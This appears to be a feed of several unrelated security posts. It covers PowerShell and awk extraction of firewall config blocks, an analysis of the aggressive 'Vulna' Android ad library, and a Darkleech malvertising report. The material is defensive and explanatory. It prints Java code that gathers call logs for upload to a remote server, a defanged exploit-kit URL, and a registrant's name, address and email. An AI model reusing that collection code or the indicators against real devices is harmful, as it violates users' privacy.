set srcaddr "vpn-CandC-1" "vpn-CandC-2" "vpn-CandC-3"
set dstaddr "all"
set action accept
set schedule "always"
set service "ANY"
set logtraffic enable
next

Patrick gave us the full text and the expected output. In short, he wants the text between "edit" and "next" if it contains the text "port10". To begin this task, we first need to get each of the edit/next chunks.

PS C:\> ((cat fw.txt) -join "`n") | select-string "(?s)edit.*?next" -AllMatches | 
select -ExpandProperty matches

This command will read the entire file fw.txt and combine it into one string. Normally, each line is treated as a separate object, but we are going to join them into a big string using the newline (`n) to join each line. Now that the text is one big string we can use Select-String with a regular expression to find all the matches. The regular expression will find text across line breaks and allows for very flexible searches so we can find our edit/next chunks. Here is a breakdown of the pieces of the regular expression:

  • (?s) - Use single line mode where the dot (.) will match any character, including a newline character. This allows us to match text across multiple lines.
  • edit - the literal text "edit"
  • .*? - find any text, but be lazy, not greedy. This means it should match the smallest chunks that will match the criteria.
  • next - literal text next

Now that we have the chunks we use a Where-Object filter (alias ?) to find matching objects to pass down the pipeline.

PS C:\> ((cat .\fw.txt) -join "`n") | select-string "(?s)edit.*?next" -AllMatches | 
select -ExpandProperty matches | ? { $_.Value | Select-String "port10" }

Inside the Where-Object filter we can check the Value property to see if it contains the text "port10". The Value property is piped into Select-String to look for the text "port10". If it contains "port10", the object continues down the pipeline; if not, it is dropped.

At this point, we have the objects we want, so all we need to do is display the results by expanding the Value and displaying it again. The expansion means that it just displays the text and no data or metadata associated with the parent object. Here is what the final command looks like.

PS C:\> ((cat .\fw.txt) -join "`n") | select-string "(?s)edit.*?next" -AllMatches | 
select -ExpandProperty matches | ? { $_.Value | Select-String "port10" } |
select -ExpandProperty Value

Not so bad, but I have a feeling it is going to be worse for my friend Hal.

Old Hal uses some old tricks

Oh sure, I know what Tim's thinking here. "It's multi-line matching, and the Unix shell is lousy at that. Hal's in trouble now. Mwhahaha. The Command-Line Kung Fu title will finally be mine! Mine! Do you hear me?!? MINE!"

Uh-huh. Well how about this, old friend:

awk -v RS=next -v ORS=next '/port10/' fw.txt

While we're doing multi-line matching here, the blocks of text have nice regular delimiters. That means I can change the awk "record separator" ("RS") from newline to the string "next" and gobble up entire chunks at a time.

After that, it's smooth sailing. I just use awk's pattern-matching operator to match the "port10" strings. Since I don't have an action defined, "{print}" is assumed and we output the matching blocks of text.

The only tricky part is that I have to remember to change the "output record separator" ("ORS") to be "next". Otherwise, awk will use its default ORS value, which is newline. That would give me output like:


$ awk -v RS=next '/port10/' fw.txt
edit "port10"
set vdom "root"
set ip 192.168.1.54 255.255.255.248
set allowaccess ping
set type physical
set sample-rate 400
set description "Other Firewall"
set alias "fw-outside"
set sflow-sampler enable


edit "vpn-CandC-1"
set associated-interface "port10"
set subnet 10.254.153.0 255.255.255.0


edit "vpn-CandC-2"
set associated-interface "port10"
...

The "next" terminators get left out and we get extra lines in the output. But when ORS is set properly, we get exactly what we were after:


$ awk -v RS=next -v ORS=next '/port10/' fw.txt
edit "port10"
set vdom "root"
set ip 192.168.1.54 255.255.255.248
set allowaccess ping
set type physical
set sample-rate 400
set description "Other Firewall"
set alias "fw-outside"
set sflow-sampler enable
next
edit "vpn-CandC-1"
set associated-interface "port10"
set subnet 10.254.153.0 255.255.255.0
next
edit "vpn-CandC-2"
set associated-interface "port10"
...

So that wasn't bad at all. Sorry about that Tim. Maybe next time, old buddy.
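A stricter variant of the two extractions above, added here as an example and not part of the original episode: it treats only a line consisting solely of next as a terminator, counts nested edit/next pairs, and matches the quoted name exactly so that port10 does not also select port100. The function names and the sample data (including the nested config section and its key names) are constructed for illustration.

```shell
#!/bin/sh
# extract_blocks NAME [FILE]   (hypothetical helper; reads stdin when FILE is omitted)
# Prints every top-level edit ... next block that references "NAME" as a
# complete quoted token.
extract_blocks() {
    awk -v name="$1" '
    BEGIN { needle = "\"" name "\"" }
    # An "edit" line opens a block; a nested edit only raises the depth.
    $1 == "edit" { if (depth++ == 0) { buf = ""; hit = 0 } }
    depth > 0 {
        buf = buf $0 "\n"
        # index() is a literal substring test, so NAME is never used as a regex.
        if (index($0, needle)) hit = 1
    }
    # Only a line whose sole word is "next" closes a block, so the word
    # "next" inside a description cannot cut a block short.
    $1 == "next" && NF == 1 && depth > 0 {
        if (--depth == 0 && hit) printf "%s", buf
    }
    ' "${2:--}"
}

# Constructed sample in the same flattened layout as the data above.
sample_config() {
cat <<'EOF'
edit "port10"
set description "next-hop to Other Firewall"
set alias "fw-outside"
next
edit "port100"
set alias "lab"
next
edit "vpn-CandC-1"
set associated-interface "port10"
set subnet 10.254.153.0 255.255.255.0
next
edit 92
set srcintf "port1"
config sub-entries
edit 1
set member "port10"
next
end
set action accept
next
EOF
}

sample_config | extract_blocks port10
```

A multi-character RS, as used in the awk one-liner, is left unspecified by POSIX (gawk and mawk accept it); this version relies only on line-by-line processing.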

Jaime Filson on gitDigger, Jared DeMott on C/C++ Auditing – Episode 347 – October 3, 2013

Jaime "WiK" Filson enjoys long walks on the beach while his computer equipment is busy fuzzing software, cracking passwords, or spidering the internet. He's also the creator of the gitDigger project as well as staff of DEFCON's wireless village.

Jared DeMott has spoken at security conferences such as Black Hat, Defcon, ToorCon, Shakacon, DakotaCon, GRRCon, and DerbyCon. He is active in the security community by teaching his Application Security course, and has co-authored a book on Fuzzing.

Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions

FireEye researchers have discovered a rapidly-growing class of mobile threats represented by a popular ad library affecting apps with over 200 million downloads in total. This ad library, anonymized as "Vulna," is aggressive at collecting sensitive data and is able to perform dangerous operations such as downloading and running new components on demand. Vulna is also plagued with various classes of vulnerabilities that enable attackers to turn Vulna's aggressive behaviors against users. We coined the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics. Most vulnaggressive libraries are proprietary and it is hard for app developers to know their underlying security issues. Legitimate apps using vulnaggressive libraries present serious threats for enterprise customers. FireEye has informed both Google and the vendor of Vulna about the security issues and they are actively addressing them.

Recently FireEye discovered a new mobile threat from a popular ad library that no other anti-virus or security vendor has reported publicly before. Mobile ad libraries are third-party software included by host apps in order to display ads. Because this library’s functionality and vulnerabilities can be used to conduct large-scale attacks on millions of users, we refer to it anonymously by the code name “Vulna” rather than revealing its identity in this blog.

We have analyzed all Android apps with over one million downloads on Google Play, and we found that over 1.8% of these apps used Vulna. These affected apps have been downloaded more than 200 million times in total.

Though it is widely known that ad libraries present privacy risks such as collecting device identifiers (IMEI, IMSI, etc.) and location information, Vulna presents far more severe security issues. First, Vulna is aggressive: if instructed by its server, it will collect sensitive information such as text messages, phone call history, and contacts. It also performs dangerous operations such as executing dynamically downloaded code. Second, Vulna contains a number of diverse vulnerabilities. These vulnerabilities, when exploited, allow an attacker to utilize Vulna’s risky and aggressive functionality to conduct malicious activity, such as turning on the camera and taking pictures without the user’s knowledge, stealing two-factor authentication tokens sent via SMS, or turning the device into part of a botnet.

We coin the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics.

The following is a sample of the aggressive behaviors and vulnerabilities we have discovered in Vulna:

  • Aggressive Behaviors

    • In addition to collecting information used for targeting and tracking such as device identifiers and location, as many ad libraries do, Vulna also collects the device owner's email address and the list of apps installed on the device. Furthermore, Vulna has the ability to read text messages, phone call history, and contact list, and share this data publicly without any access control through a web service that it starts on the device.

    • Vulna will download arbitrary code and execute it when instructed by the remote server.

  • Vulnerabilities

    • Vulna transfers user’s private information over HTTP in plain text, which is vulnerable to eavesdropping attacks.

    • Vulna also uses unsecured HTTP for receiving commands and dynamically loaded code from its control server. An attacker can convert Vulna to a botnet by hijacking its HTTP traffic and serving malicious commands and code.

    • Vulna uses Android’s WebView with JavaScript-to-Java bindings in an insecure way. An attacker can exploit this vulnerability and serve malicious JavaScript code to perform harmful operations on the device. This vulnerability is an instance of a common JavaScript binding vulnerability which has been estimated to affect over 90% of Android devices.

      Vulna’s aggressive behaviors and vulnerabilities expose Android users, especially enterprise users, to serious security threats. By exploiting Vulna’s vulnaggressive behaviors, an attacker could download and execute arbitrary code on the user’s device within Vulna's host app. From our study, many host apps containing Vulna have powerful permissions that allow controlling the camera; reading and/or writing SMS messages, phone call history, contacts, browser history and bookmarks; and creating icons on the home screen. An attacker could utilize these broad permissions to perform malicious actions. For example, attackers could:

      • steal two-factor authentication token sent via SMS
      • view photos and other files on the SD card
      • install icons used for phishing attacks on the home screen
      • delete files and destroy data on demand
      • impersonate the owner and send forged text messages to business partners
      • delete incoming text messages without the user’s notice
      • place phone calls
      • use the camera to take photos without user’s notice
      • read bookmarks or change them to point to phishing sites

      There are many possible ways an attacker could exploit Vulna’s vulnerabilities. One example is public WiFi hijacking: when the victim’s device connects to a public WiFi hotspot (such as at a coffee shop or an airport), an attacker nearby could eavesdrop on Vulna’s traffic and inject malicious commands and code.

      Attackers can also conduct DNS hijacking to attack users around the world, as in the Syrian Electronic Army’s recent attacks targeting Twitter, the New York Times, and Huffington Post. In a DNS hijacking attack, an attacker could modify the DNS records of Vulna’s ad servers to redirect visitors to their own control server, in order to gather information from or send malicious commands to Vulna on the victim’s device.

      Despite the severe threats it poses, Vulna is stealthy and hard to detect:

      • Vulna receives commands from its ad server using data encoded in HTTP header fields instead of the HTTP response body.

      • Vulna obfuscates its code, which makes traditional analysis difficult.

      • Vulna's behaviors can be difficult to trigger using traditional analysis. For example, in one popular game, Vulna is executed only at certain points in the game, such as when a specific level is reached, as shown in the figure below. (The figure has been partially blurred to hide the identity of the app.) When Vulna is executed, the only effect visible to the user is the ad on top of the screen. However, Vulna quietly executes its risky behaviors in the background.

        [Figure: Vulna's screenshot]

      FireEye Mobile Threat Prevention applies a unique approach and technology that made it possible to discover the security issues outlined in this post quickly and accurately despite these challenges. We have provided information about the discovered security issues, the list of impacted apps, and suggestions to both Google and the vendor of Vulna. They have confirmed the issues and are actively addressing them.

      In conclusion, we have discovered a new mobile threat from a popular ad library (codenamed "Vulna" for anonymity). This library is included in popular apps on Google Play which have more than 200 million downloads in total. Vulna is an instance of a rapidly-growing class of mobile threat, which we have termed vulnaggressive ad libraries. Vulnaggressive ad libraries are disturbingly aggressive at collecting users’ sensitive data and embedding capabilities to execute dangerous operations on demand, and they also contain different classes of vulnerabilities which allow attackers to utilize their aggressive behaviors to harm users. App developers using these third-party libraries are often not aware of the security issues in them. These threats are particularly serious for enterprise customers. Furthermore, this vulnaggressive characteristic is not limited to ad libraries; it also applies to other third-party components and apps.

      Acknowledgement

      Special thanks to FireEye team members Adrian Mettler, Peter Gilbert, Prashanth Mohan, and Andrew Osheroff for their valuable help on writing this blog. We also thank Zheng Bu and Raymond Wei for their valuable comments and feedback.

      Appendix: Sample code snippet of collecting and sending call logs in Vulna

       

      class x implements Runnable
      {
          public void run() {
              // Collect the call log and upload it to the remote server.
              List localList = get_call_log();
              construct_JSON_and_send_to_remote(localList);
          }
      }

      List get_call_log()
      {
          ArrayList localArrayList = new ArrayList();
          // Query the ten most recent call-log entries.
          Cursor cur1 = getContentResolver().query(CallLog.Calls.CONTENT_URI,
                  new String[] { "number", "type", "date" }, null, null,
                  "date DESC limit 10");
          Cursor cur2 = cur1;
          if (cur2 != null) {
              int i = cur2.getColumnIndex("number");
              int j = cur2.getColumnIndex("type");
              while (cur2.moveToNext()) {
                  String str = cur2.getString(i);
                  // Type 2 is CallLog.Calls.OUTGOING_TYPE: keep each dialed number once.
                  if ((cur2.getInt(j) == 2) && (!localArrayList.contains(str)))
                      localArrayList.add(str);
              }
          }
          return localArrayList;
      }

Another Darkleech Campaign

Last week got us up close and personal with Darkleech and Blackhole with our external careers web site.

The fun didn’t end there: this week we saw a tidal wave of Darkleech activity linked to a large-scale malvertising campaign identified by the following URL:

hXXp://delivery[.]globalcdnnode[.]com/7f01baa99716452bda5bba0572c58be9/afr-zone.php

Again Darkleech was up to its tricks, injecting URLs and sending victims to a landing page belonging to the Blackhole Exploit Kit, one of the most popular and effective exploit kits available today. Blackhole wreaks havoc on computers by exploiting vulnerabilities in client applications like IE, Java and Adobe. Computers that are vulnerable to exploits launched by Blackhole are likely to become infected with one of several flavors of malware, including ransomware, Zeus/Zbot variants and clickfraud trojans like ZeroAccess.

We started logging hits at 21:31:00 UTC on Sunday 09/22/2013. The campaign has been ongoing, peaking on Monday and tapering off throughout the week.

During most of the campaign’s run, delivery[.]globalcdnnode[.]com appeared to have gone dark, no longer serving the exploit kit’s landing page as expected and then stopped resolving altogether, yet tons of requests kept flowing.

This left some scratching their heads as to whether the noise was a real threat.

Indeed, it was a real threat, as Blackhole showed up to the party a couple of days later; this was confirmed by actually witnessing a system get attacked on a subsequent visit to the URL.

 

Figure 1. – Session demonstrating exploit via IE browser and Java.

 

The server returned the (obfuscated) Blackhole Landing page; no 404 this time.

Figure 2. – Request and response to delivery[.]globalcdnnode[.]com.

 

The next stage was to load a new URL for the malicious jar file. At this point, the unpatched Windows XP system running vulnerable Java quickly succumbed to CVE-2013-0422.

Figure 3 – Packet capture showing JAR file being downloaded.

Figure 4. – Some of the Java class files visible in the downloaded Jar.

 

Even though our system was exploited and the browser was left in a hung state, it did not receive the payload. Given the sporadic availability during the week of both the host and exploit kit’s landing page, it’s possible the system is or was undergoing further setup and this is the prelude to yet another large-scale campaign.

We can’t say for sure but we know this is not the last time we will see it or the crimeware actor behind it.

Registrant:

Name: Alexey Prokopenko
Organization: home
Address: Lenina 4, kv 1
City: Ubileine
Province/state: LUGANSKA OBL
Country: UA
Postal Code: 519000
Email: alex1978a @bigmir.net

By the way, this actor has a long history of malicious activity online too.

The campaign also appears to be abusing Amazon Web Services.

globalcdnnode.com
Server:           ns-293.awsdns-36.com
Address:    205.251.193.37#53

globalcdnnode.com
origin = ns-293.awsdns-36.com
mail addr = awsdns-hostmaster.amazon.com

At time of this writing, the domain delivery[.]globalcdnnode[.]com was still resolving, using fast-flux DNS techniques to resolve to a different IP address every couple minutes, thwarting attempts at shutting down the domain by constantly being on the move.

Figure 5. – The familiar Plesk control panel, residing on the server.

This was a widespread campaign, indirectly affecting many web sites via malvertising techniques. The referring hosts run the gamut from local radio stations to high profile news, sports, and shopping sites. Given the large amounts of web traffic these types of sites see, it's not surprising there was a tidal wave of requests to delivery[.]globalcdnnode[.]com. Every time a page with the malvertisement was loaded, a request was made to hXXp://delivery[.]globalcdnnode[.]com/7f01baa99716452bda5bba0572c58be9/afr-zone.php in the background.

To give an example of what this activity looked like from DTI, you can see the numbers in the chart below.

 

Figure 6. – DTI graph showing number of Darkleech detections logged each day.

By using malvertising and/or posing as a legitimate advertiser or content delivery network, the bad guys infiltrate the web advertisement ecosystem. This results in their malicious content getting loaded in your browser, oftentimes in the background, while you browse sites that have nothing to do with the attack (as was the case in our careers site).

Imagine a scenario where a good portion of enterprise users have a home page set to a popular news website. More than likely, the main web page has advertisements, and some of those ads could be served from third-party advertiser networks and/or CDNs. If just one of those advertisements on the page is malicious, visitors to that page are at risk of redirection and/or infection, even though the news website’s server is itself clean.

So, when everybody shows up to work on Monday and opens their browsers, there could be a wave of clients making requests to exploit kit landing pages. If Darkleech is lurking in those advertisement waters, you could end up with a leech or two attached to your network.
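One way to measure that wave in your own web proxy logs, as an added example that is not part of the original post: it refangs the host published above, matches it exactly together with the afr-zone.php file name, and reports hits, distinct clients and distinct referring hosts per UTC day. The log layout, the function names and the sample lines (client addresses, referrers, status codes) are constructed for illustration.

```shell
#!/bin/sh
# Indicators as published above; the host stays defanged until match time.
IOC_HOST_DEFANGED='delivery[.]globalcdnnode[.]com'
IOC_FILE='afr-zone.php'

# Turn a defanged indicator back into its real form.
refang() { printf '%s\n' "$1" | sed 's/\[\.\]/./g; s/^hXXp/http/'; }

# darkleech_daily < proxy.log
# Assumed log layout (constructed), space separated:
#   UTC-timestamp client-ip method url referer status
# Output, one line per day: day hits distinct_clients distinct_referer_hosts
darkleech_daily() {
    awk -v host="$(refang "$IOC_HOST_DEFANGED")" -v file="$IOC_FILE" '
    function hostof(u,   p) { split(u, p, "/"); return tolower(p[3]) }
    {
        n = split($4, seg, "/")             # seg[3] = host, seg[n] = file
        leaf = seg[n]; sub(/[?#].*/, "", leaf)
        # Exact string comparison: look-alike hosts that merely contain
        # the indicator as a substring are not counted.
        if (tolower(seg[3]) != host || leaf != file) next
        day = substr($1, 1, 10)
        hits[day]++
        if (!((day, $2) in seenc)) { seenc[day, $2] = 1; clients[day]++ }
        r = hostof($5)
        if (!((day, r) in seenr)) { seenr[day, r] = 1; refs[day]++ }
    }
    END { for (d in hits) print d, hits[d], clients[d], refs[d] }
    ' | sort
}

# Constructed proxy log lines for the example.
sample_proxy_log() {
    h=$(refang "$IOC_HOST_DEFANGED")
    p="7f01baa99716452bda5bba0572c58be9/$IOC_FILE"
    cat <<EOF
2013-09-22T21:31:00Z 10.1.1.23 GET http://$h/$p http://radio.example/home 404
2013-09-23T08:02:11Z 10.1.1.23 GET http://$h/$p http://news.example/ 404
2013-09-23T08:02:15Z 10.1.2.40 GET http://$h/$p http://news.example/sports 404
2013-09-23T08:05:00Z 10.1.2.41 GET http://$h/$p http://shop.example/cart 200
2013-09-23T08:06:00Z 10.1.2.41 GET http://$h.example.net/$p http://shop.example/ 200
2013-09-23T08:07:00Z 10.1.2.41 GET http://$h/favicon.ico - 404
2013-09-23T09:00:00Z 10.1.2.50 GET http://news.example/index.html - 200
EOF
}

sample_proxy_log | darkleech_daily
```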